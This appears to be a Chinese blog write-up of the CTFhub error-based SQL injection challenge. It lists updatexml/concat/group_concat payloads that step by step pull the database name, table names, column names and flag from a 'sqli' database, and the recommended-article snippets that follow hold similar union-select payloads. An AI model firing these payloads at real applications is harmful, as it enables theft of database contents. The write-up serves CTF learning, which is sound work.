CTFhub-sqli注入-报错注入

最新推荐文章于 2026-02-12 19:07:25 发布
原创 最新推荐文章于 2026-02-12 19:07:25 发布 · 1.4k 阅读 · 0 ·
本内容遵循CC 4.0 BY-SA版权协议
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
标签
#sql #mybatis #数据库
文章详细展示了如何通过SQL注入技巧,利用`updatexml`、`concat`、`group_concat`等函数从`sqli`数据库中提取表名、列名和特定flag字段的信息,以展示潜在的安全风险。

用到的函数

updatexml(1,       ,1)

concat(0x7e,       ,0x7e)

group_concat(目标值)

right(,32) 

1

1'

 1 union select updatexml(1,concat(0x7e,database(),0x7e),1)

1 union select updatexml(1,concat(0x7e,(select(group_concat(table_name))from information_schema.tables where table_schema='sqli'),0x7e),1)

1 union select updatexml(1,concat(0x7e,(select(group_concat(column_name))from information_schema.columns where table_schema='sqli' and table_name='flag'),0x7e),1)

 1 union select updatexml(1,concat(0x7e,(select(group_concat(flag))from sqli.flag),0x7e),1)

 1 union select updatexml(1,concat(0x7e,right((select(group_concat(flag))from sqli.flag),32),0x7e),1)

二、CTF-Web-SQLi-Labs(记录CTF学习)
qq_27920699的博客
12-16 531
个人CTF学习之路
BUUCTF/sqli-labs 1-23关
weixin_44041994的博客
03-21 2222
因为#号后面都被注释了。这关输入正确用户名密码后,页面显示的不再是User-Agent,而是变成了Refer,我们通过抓包更改Refer,发现和18关差不多,只不过18关有3个参数,而19关只有两个参数。上面提示让我们使用outfile,outfile是sql的语法,可以通过into outfile命令,将查询到的结果写入目标路径,在知道目标系统的绝对路径时可以使用,如。这关通过测试,发现无论sql语句正确与否,返回的信息都是一样的,这样就不符合布尔注入的前提了,布尔盲注只适用于正确与错误结果不同的情况。
青少年CTF平台---sqli-labs
t235336456的博客
11-30 765
看到有个flag表然后查看段名(id=-1' union select 1,group_concat(column_name),3 from information_schema.columns where table_schema='security' and table_name='flag' --+)查数据(id=-1' union select 1,group_concat(0x7e,flag),3 from security.flag --+)题目:sqli-labs。到4的时候会返回错误信息。
CTF学习笔记——SQL注入
xuanyulevel6的博客
08-25 6746
以pikachu靶场练习来学习ctf知识
[NCTF2019]SQLi --BUUCTF --详解
金 帛的博客
06-13 1666
BUUCTF记录贴
sql报错注入 (sqli labs less5 + CTFHub + buuctf极客大挑战2019HardSQL)
2501_92612816的博客
07-10 1075
输入发现产生语法错误通过故意构造触发数据库错误,来获取敏感信息获取数据库信息下一步获取时发现有字符长度限制,使用substr来获取信息得到information_schema,challenges,mysql,performance_schema,security,study,sys继续获取security下的信息0x7e是~,用于作为分隔符发现敏感信息进一步即可获取信息,同样使用substr即可原理与上相同?同样存在字符限制。
SQL注入-CTFHub
Keeping it fresh at all times.
02-03 1128
本文是CTFHub技能树Web系列的文章之一,重点学习了Web安全中的SQL注入漏洞。SQL注入是owasp top10之一,是Web安全必学漏洞。
CTFHub-报错注入wp
XINnnnnnnnllll的博客
07-16 456
要提取子字符串的原始字符串(可以是字段名或字符串字面量)输入查询表名不能舍掉select。起始位置,指定从哪个字符开始提取。得到的两个结果拼接起来即为答案。
CTFHub SQL注入实战:从手工注入sqlmap自动化工具全解析
最新发布
dell8的博客
02-12 653
本文全面解析了CTFHub平台上的SQL注入实战技巧,涵盖从手工注入sqlmap自动化工具的全过程。详细介绍了整数型、字符型、报错注入和盲注等核心方法,并提供了绕过过滤等高级技巧,帮助读者构建完整的SQL注入知识体系与实战能力。
CTF 三大测试靶场搭建:DVWA、SQLi-LABS、upload-labs 靶场部署教程(VM + CentOS 7 + Docker)
zatongtong的博客
01-18 4331
基于 CentOS 7 系统,利用 Docker 部署 DVWA、SQLi-LABS、upload-labs 靶场,靶场的初始化,Docker 基本使用
CTFSqli-Labs题目解析(1-11题)
a690135443的博客
06-14 1657
第一题 提示输入numeric类型的ID作为参数,尝试在url后添加?id=1查看,发现有显示。 改为?id=-1后无显示,也无报错,于是可以考虑-1空出位置后加union select爆数据。 改为?id=1'单引号报错,双引号不报错,可以推断出使用单引号闭合,加上注释之后,错误也消失了,所以可以在这个时候union select了。 然后添加order by语句,?id=1' order by 4 --+,当order by 4的时候报错,所以一共有3个字段。 然后使用unio
网络知识扫盲
weixin_34416649的博客
05-29 230
SQL 注入 通过在用户可控参数中注入 SQL 语法,破坏原有 SQL 结构,达到编写程序时意料之外结果的攻击行为。其成因可以归结为以下两个原因叠加造成的: 1. 程序编写者在处理应用程序和数据库交互时,使用字符串拼接的方式构造 SQL 语句 2. 未对用户可控参数进行足够的过滤便将参数内容拼接进入到 SQL 语句中 XSS 跨站脚本攻击 跨站脚本攻击(Cross Site Script...
【安全测试学习】自动化注入攻击之 FuzzDB和Burp 组合拳
aovenus的专栏-测试新时代(微信公众号:测试新时代)
11-18 2687
自动化注入攻击之 FuzzDB和BurpSuite 组合拳
“百度杯”CTF比赛 九月场 SQLi 解题思路
****的博客
10-15 1326
题目简介 题目名称:SQLi 题目内容:后台有获取flag的线索 解题思路 打开地址使用burp抓包发现“l0gin.php?id=1”。 打开“l0gin.php?id=1”地址 使用1’ and ‘1’=‘1(成功)和1’ and ‘1’='2(不成功),说明此处存在sql注入。测试中发现后台过滤了逗号,在这里使用from for代替逗号。 开始注入 猜测数据库名称 猜测数据库名...
SQLI】 无回显SQL盲注解题方法
D-river博客
02-24 1205
无回显注入的核心是通过条件触发延迟或外带通道获取数据。优先尝试时间盲注,若环境允许则结合OOB技术提升效率。编写自动化脚本并合理优化判断逻辑(如二分法)是关键。
SQLISQL注入解题步骤总结
D-river博客
02-24 1221
CTF比赛中,SQL注入题的解题过程通常分为以下步骤,涵盖注入点识别、过滤绕过、数据提取等关键环节。
CTF渗透训练(笔记)
何辰风的博客
12-26 2494
将该请求发送至repeater页面并且修改文件名为要执行的PHP代码,点击go将请求发出,点击Render查看图形化的响应页面,其中包含代码执行的结果.利用远程代码执行漏洞下载木马,因为需要绕过防火墙的原因所以对要执行的代码进行base64形式的编码,将生成的木马放到web网站的主目录下面
ctf每日练习-第四天
想变得强大,虽然现在还弱不禁风
09-05 356
今天的内容主要是sqli,好几天没写首先因为这几天刚开学事情比较多,二是因为这几天一直都在学习,刷题反而不是很多,今天和同学去图书馆学了一波,感觉收获很大。 easy_sql(来自攻防世界web进阶区) 题目链接: easy_sql. 首先我们尝试一个单引号,报错 error 1064 : You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the
BUUCTF--[NCTF2019]SQLi
qq_46263951的博客
07-14 598
首先我们在窗口中尝试一些闭合发现都被禁用了 通过使用御剑可以扫描到robots.txt文件,进入查看可以找到hint.txt文件 regexp正则注入 简单来说regexp用来匹配文本,不区分大小写,可以从头开始一位一位进行爆破 根据提示我们需要对passwd进行爆破,用户名可以任意 If $_POST['passwd'] === admin's password, Then you will get the flag; 空格由/**/,or可以用||代替 综上,我们可以大致构..
BUUctf刷题第四天
jie_a的博客
06-20 246
[极客大挑战 2019]HardSQL 这道题利用了报错注入 updatexml(1,concat(0x7e,(SELECT(database())),0x7e),1) updatexml(1,concat(0x7e,(select(group_concat(table_name))from(information_schema.tables)where(table_schema)like(database())),0x7e),1) updatexml(1,concat(0x7e,(select(group
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

斜躺青年

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值